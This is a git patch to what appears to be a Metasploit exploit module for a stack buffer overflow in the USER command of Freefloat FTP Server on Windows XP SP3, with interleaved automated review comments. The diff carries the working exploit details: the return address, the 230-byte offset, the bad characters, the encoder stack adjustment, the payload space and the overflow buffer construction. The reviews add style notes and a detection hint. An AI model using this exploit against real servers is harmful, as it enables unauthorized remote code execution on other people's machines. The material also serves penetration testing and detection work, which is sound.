From 4e8d32a89afbfbff8c0350088ae6980d88bf8410 Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Tue, 16 Apr 2013 20:43:38 -0500
Subject: [PATCH] cleanup for freefloatftp_user
---
 .../exploits/windows/ftp/freefloatftp_user.rb | 19 +++++++++----------
 1 file changed, 9 insertions(+), 10 deletions(-)
diff --git a/modules/exploits/windows/ftp/freefloatftp_user.rb b/modules/exploits/windows/ftp/freefloatftp_user.rb
index aa172070d0..e5009b4cea 100644
--- a/modules/exploits/windows/ftp/freefloatftp_user.rb
+++ b/modules/exploits/windows/ftp/freefloatftp_user.rb
@@ -8,20 +8,19 @@
 require 'msf/core'
 class Metasploit4 < Msf::Exploit::Remote
- Rank = LowRanking
+ Rank = NormalRanking
- include Msf::Exploit::Remote::Tcp
 include Msf::Exploit::Remote::Ftp
 def initialize(info = {})
 super(update_info(info,
 'Name' => 'Free Float FTP Server USER Command Buffer Overflow',
 'Description' => %q{
- Freefloat FTP Server is prone to an overflow condition. It
- fails to properly sanitize user-supplied input resulting in a
- stack-based buffer overflow. With a specially crafted 'USER'
- command, a remote attacker can potentially have an unspecified
- impact.
+ Freefloat FTP Server is prone to an overflow condition. It
+ fails to properly sanitize user-supplied input resulting in a
+ stack-based buffer overflow. With a specially crafted 'USER'
+ command, a remote attacker can potentially have an unspecified
+ impact.
 },
 'Platform' => 'win',
 'Author' =>
@@ -38,14 +37,14 @@ class Metasploit4 < Msf::Exploit::Remote
 'Privileged' => false,
 'Payload' =>
 {
- 'Space' => 440,
+ 'Space' => 444,
 'DisableNops' => true,
 'BadChars' => "\x00\x0a\x0d",
 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
 },
 'Targets' =>
 [
- [ 'Windows XP SP3',
+ [ 'FreeFloat / Windows XP SP3',
 {
 'Ret' => 0x77c35459 , # push esp; ret - mscvrt.dll
 'Offset' => 230
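Review bot: `Rank = NormalRanking` replaces `LowRanking` in a commit titled only "cleanup", and neither the message nor a comment states what justified the higher rank. Rank affects how tooling and reviewers treat the module, so the basis belongs next to the constant, for example `# NormalRanking: <reason, e.g. which targets were tested>`, or in a commit of its own. The product name is also spelled three ways across the patch: `Free Float` in `'Name'`, `Freefloat` in the description, and `FreeFloat` in the renamed target of the second hunk. One spelling throughout would make the module easier to search for. The `initialize` body continues past the end of this hunk.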
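Review bot: `'Space' => 444` grows by four bytes in the same commit that shortens the filler in the last hunk from `make_nops(12)` to `rand_text(8)`, which suggests the two numbers are linked, yet nothing in the code records that. A comment beside `'Space'`, such as `# keep in sync with the filler length before payload.encoded`, would stop a later edit from changing only one of them. The context comment on `'Ret'` misspells the library as `mscvrt.dll`; it should read `msvcrt.dll`. For detection work, the constant NOP run is no longer sent after this change, so a rule for this traffic should rely on the oversized `USER` argument (longer than the 230-byte `'Offset'`) rather than on filler bytes.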
@@ -70,7 +69,7 @@ class Metasploit4 < Msf::Exploit::Remote
 connect
 buf = rand_text(target['Offset'])
 buf << [ target['Ret'] ].pack('V')
- buf << make_nops(12)
+ buf << rand_text(8)
 buf << payload.encoded
 send_user(buf)
 disconnect